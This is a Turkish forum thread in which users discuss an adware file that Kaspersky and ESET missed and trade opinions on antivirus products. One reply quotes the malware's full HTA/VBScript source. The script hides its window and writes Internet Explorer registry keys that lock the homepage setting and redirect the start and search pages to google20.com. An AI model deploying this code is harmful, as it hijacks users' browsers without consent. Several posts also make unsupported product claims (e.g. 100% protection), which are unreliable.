Kaspersky,Eset Nod32 2 dünya devi bu Virüsü Göremiyor

adeleks

Öğrenci
Reaksiyon puanı
0
Geçenlerde bilgisayarıma virüs bulaştı.Bilgisayarımda Kaspersky İnternet Security 8.0.506 (Lisanslı+güncel) vardı. Dosyayı taratmama rağmen virüs bulmayınca bende tıkladım ve tıklar tıklamaz internet giriş sayfamın değiştiğini gördüm.Daha sonra dosyayı online virüs scan ile tarattığımda sonuçlar herşeyi gösteriyordu.İşte sonuçlar :thumbdown:Ekli dosyayı görüntüle 1339 (kesinlikle virüs dosyasına tıklamayınız sadece virüsü göstermek için koydum)

Peki Sizin Antivirüs programınız bu virüsü görüyormu ?

tmpuser

Profesör
Reaksiyon puanı
1
Normal bişey Her zaman her virüsü yakalayacak diye bişey yok

Birisinin bulamadığını bazen başkası buluyor :wink:

yengec

Doçent
Reaksiyon puanı
0
Evet kesinlikle öyle başkasının bulduğunu diğeri bulamıyor. Onun için ki ortalama olarak en iyisi hangisi ona bakmak lazım.

jungeman

Profesör
Reaksiyon puanı
67
Bazı buldukları sadece bunlar bu tür olabilir oluyor aslında virüs olmayabiliyor.

spybot

Guru
Emektar
Müdavim
Reaksiyon puanı
629
Antivir kullan bence...:D

uA-CetiN

Doçent
Reaksiyon puanı
55
bitdefender kullanıyorum memnunum :) Nod32'nin Kasperden iyi olduğunu duymuştum.

BuzzKnight

Doçent
Reaksiyon puanı
3
Yıllardır Panda , BitDefender , Eset , Kaspersky denedikten şu sıralarda AVG denemekteyim AVG tek kelimeyle deneme sürümü olmasına rağmen çok güzel çalışmakta.Denemeyen arkadaşlar bence bir denesinler derim.

kapadokyalı

Asistan
Reaksiyon puanı
1
şimdi şöyle bişey var ben virüs şirketlerinin online uygulamalarını bi nevi reklam olarak görüyorum ve bu taramaların çoğunda gerçekte olmayan virüs trojan vb şeyleri var olarak gösteriyor ama online olarak temizlemiyor tabi... aslında satış için güzel bir strateji :D

oslun

Dekan
Reaksiyon puanı
33
bence dünya devlerini bırak dünya devi adaylarına bak :) mesela ücretsiz bir Türk antivirüs yazılımı var antikor diye. Onu kullan hem gelişmelerine yardımcı olursun hem de bilgisayarını antikorlamış olursun virüslere karşı :)

ESES35

Asistan
Reaksiyon puanı
1
arkadaşlar McAfee bu tür virüsleri affetmiyor zaten birçok virüs programı ile yapılan testlerde mcafee nin dışındaki yazılımlar en az %10 virüs geçişi yapıyor ama mcaafe %100 koruyor öneririm....:yes:

yasin04

Doçent
Reaksiyon puanı
3
arkadaş sen bırak diğerlerinin yorumlarını bana bak nod32 kullan bence ayrıca dosyayı analize gönder iki günde bulur

MESELA ;
benim sisteme yeni bir virus bulaştı... nod32 olmasaydı sistem anında çöküyodu... virusu otomatik analize gönderdi... ve sonuç hemen yeni bir zararlı diye algıladı hepsini sildi... combofix uyguladım... ve tmm

sakallıoğlu

Profesör
Reaksiyon puanı
1
İki türlü Virüs Programı vardı;
- Virüs bulaşınca bağıranlar
- Virüsü bulaşmadan bağıranlar.
Her ikiside şu anda bende mevcut.

nevrans

Asistan
Reaksiyon puanı
6
yazıları okuyorum hala nod32 kaspersky denıyor g-data en ıyısı 250 mb yazılımın ıcınde 10 buyuk fırmanın adı gecıyor g-data ıcndekı avast trojanlarda cok ıyıdır bıtfender ne kadar ıyı oldugunu soylemeye gerek bıle yok kaspersky trojanlarda ıyı degıl g-data sezgısel gucu o kadar kuvvetlıdırkı vıruslu dosyayı anında sezınler ındırmez hemen bloklar sevgılı arkadasım verdıgın vıruslu dosyayı hemen blokladı g-data ONE NUMBER G-DATA

sivaspor

Müdavim
Müdavim
Reaksiyon puanı
2
Virus'e bak hahaha

<html><head>
<hta:application id=hta_note_id
applicationName=hta_note_name
showInTaskBar=no
caption=no
innerBorder=no
selection=no
scroll=no
contextmenu=no />
<script language=javascript>
window.resizeTo(0, 0);
window.moveTo(0, 0);
</script>

<SCRIPT language=vbs>
self.MoveTo 0, 0
Set shell = CreateObject("WScript.Shell")
shell.regwrite "HKLM\Software\Policies\Microsoft\Internet Explorer\Control Panel\\HomePage","00000001","REG_DWORD"
shell.regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\\HomePage","00000001","REG_DWORD"
shell.regwrite "HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "http://www.google20.com","REG_SZ"
shell.regwrite "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "http://www.google20.com","REG_SZ"
shell.regwrite "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\\Search Bar", "http://www.google20.com","REG_SZ"
shell.regwrite "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\\Search Page", "http://www.google20.com","REG_SZ"
shell.regwrite "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\\Local Page", "http://www.google20.com","REG_SZ"
shell.regwrite "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "http://www.google20.com","REG_SZ"
shell.regwrite "HKLM\SOFTWARE\Microsoft\Internet Explorer\Components\0\\Source", "http://www.google20.com","REG_SZ"
shell.regwrite "HKLM\SOFTWARE\Microsoft\Internet Explorer\Components\0\\SubscribedURL", "http://www.google20.com","REG_SZ"
self.Close
</SCRIPT>

</head>
</body>
</html>

:w00t:/|sDn|
/&#9612;
/ \

firariçocuk

Doçent
Reaksiyon puanı
7
Arkadaşlar çok önemli bir uyarı.beni bilen bilir arkadaşlar.BİTDEFENDER ı her fırsatta övdüğümü ve her kese tavsiye ettiğimi bilir.ancak 2 gün önce olan bir olayda pc deki bitdefender ın devre dışı kaldığını gördüm ve devreye almaya çalışsamda bi türlü alamadım.kaspersky la tarattığımda adı bitdefender olan bi virüs buldu.öyleki bu bitdefenderı devre dışı bırakmasından başka D diskinde bulunan setup una da girmiş.ben şok oldum ve oylece kala kaldım.bitdefender kullanıcılarının dikkatine..ayrıca şunuda belirteyim kaspersky dan daha iyi anti-virüs programı olduğunu her zaman deneyerek hatta uygulamalarıyla tarafımdan tespit ettim ama bitdefender adlı bu virüsü kaspersky la bulunca şok oldum ve ilk defa buna şahit oldum.bu ara bitdefenderi ve setup unu dahi alt eden bu virüse tüm bitdefender kullanıcıları dikkat etmeli.pc ye format atmamış olsaydım kaspersky tarama günlüğünü buraya koyardım.konuyu görünce uyarayım dedim.saygılarımla.

denizcimavisi

Öğrenci
Reaksiyon puanı
0
Yıllardır Panda , BitDefender , Eset , Kaspersky denedikten şu sıralarda AVG denemekteyim AVG tek kelimeyle deneme sürümü olmasına rağmen çok güzel çalışmakta.Denemeyen arkadaşlar bence bir denesinler derim.

Evet bende AVG tavsiye ediyorum çok uzun bir süredir kullanıyorum ve daha hiç sorun yaşamadım hemde çok farklı siteleregirmeme ve birçok dosya alış verişi yapmama rahmen ayrıca çok kez bulaşmayı gerçek zamanlı yakalayıp karantinaya aldı
Genede en iyi diyemem herbirinin birbirinden pek farkı yok ama birinin bulamadığını biri buluyor .

korsan12

Doçent
Reaksiyon puanı
3
kaspersky 7 internet security kullanıyorum şuana kadar bilgisayarıma hiç virüs,trojan bulaşmadı. bi ara kasperky 2009 internet security kullandım 1 ay kadar ilk çıktığında sonra tekrar 7. sürümüne dönünce bi kaç virüs bulmuştu. onca antivürüs denedim hiç biri kaspersky gibi olmadı nod32 bazı virüsleri buluyor ama silemiyor silemedikten sonra neye yarar avg zaten boş bi antivürüs awast bazı virüler avastın kafasını çok karıştırıyor kendi dosyalarını bile virüs olarak görüyor. tercih sizin.

megatron

Doçent
Reaksiyon puanı
7
G-Data Live CD ile linux ortamında tarat silemediği ve tanımadığı malware yada spy yok diyebilirim. Linux ortamında yaptığı için virüsler çaresiz teslim oluyorlar. :D
Pc açılmayacak durumda olsa dahi (virüsten) tarama yapabilirsiniz.

Epeydir win7 de morro kullanıyorum gayet memnunum :w00t:

adeleks

Öğrenci
Reaksiyon puanı
0
Şu an avast home kullanıyorum eset ve kaspersky beni şaşırttı ...

mubeya

Asistan
Reaksiyon puanı
1
bende microsoft security essentials kullanıyorum ve şimdiye kadar hiç sorun çıkmadı. gayet iyi ve memnunum.ücretsiz olması ve arkasında microsoftun bulunması ayrı bir güzellik. sonuçta kendi işletim sistemlerinin açıklarını en iyi kendileri biliyor ve sürekli otomatik güncelleme yapmasıda güzel. bilgisayarıda fazla kasmıyor.